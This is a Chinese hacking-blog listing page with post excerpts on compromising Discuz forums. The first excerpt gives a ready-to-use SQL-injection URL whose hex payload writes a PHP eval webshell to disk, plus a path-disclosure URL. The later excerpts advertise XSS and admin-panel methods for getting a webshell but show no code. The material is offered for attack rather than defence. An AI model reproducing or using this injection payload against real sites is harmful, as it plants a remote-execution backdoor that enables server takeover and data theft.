Discuz7.2 XDay

作者:admin 日期:2010-04-28

http://hackqing.com/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=%27%20union%20select%20NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL%20into%20outfile%20%27E://hackertest.php%27%23%A1%B1
写入SHELL（要开DUMPFILE）
爆路径：http://www.hackqing.com//manyou/admincp.php?my_suffix=%0A%0DTOBY57

Tags: Discuz Discuz

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 158

discuz6.1后台拿webshell方法

作者:admin 日期:2009-03-13

很多朋友有了discuz6.x后台　无法得到　shell
除了　0day等方法可以拿shell　就没别的办法了　
网上也有很多但是大多不能用　

Tags: Discuz Discuz webshell webshell

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 92

Discuz XSS得webshell

作者:admin 日期:2009-02-23

By racle @tian6.com
欢迎转帖.但请保留版权信息.
受影响版本:Discuz<=6.1.0,gbk+utf+big5

新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.

Tags: Discuz Discuz webshell webshell

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 84

配合Discuz得shell-Flash XSS

作者:admin 日期:2009-02-23

By racle @tian6.com
  欢迎转帖,但请保留版权信息.
  之前我发了篇文章,关于Discuz后台上SHELL的.需要配合XSS的.似乎没什么人关注,估其原因,应该就是XSS利用方法没说,所以现在我就发一个FLASH XSS的方法.这里看不懂的话,请先看看原帖:
http://bbs.tian6.com/thread...
  往后如果有可能,我会进一步补充DISCUZ其他的XSS,Crsf等利用方法.本文大部分是搬老东西,乐意接受批评.

Tags: Discuz Discuz

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 89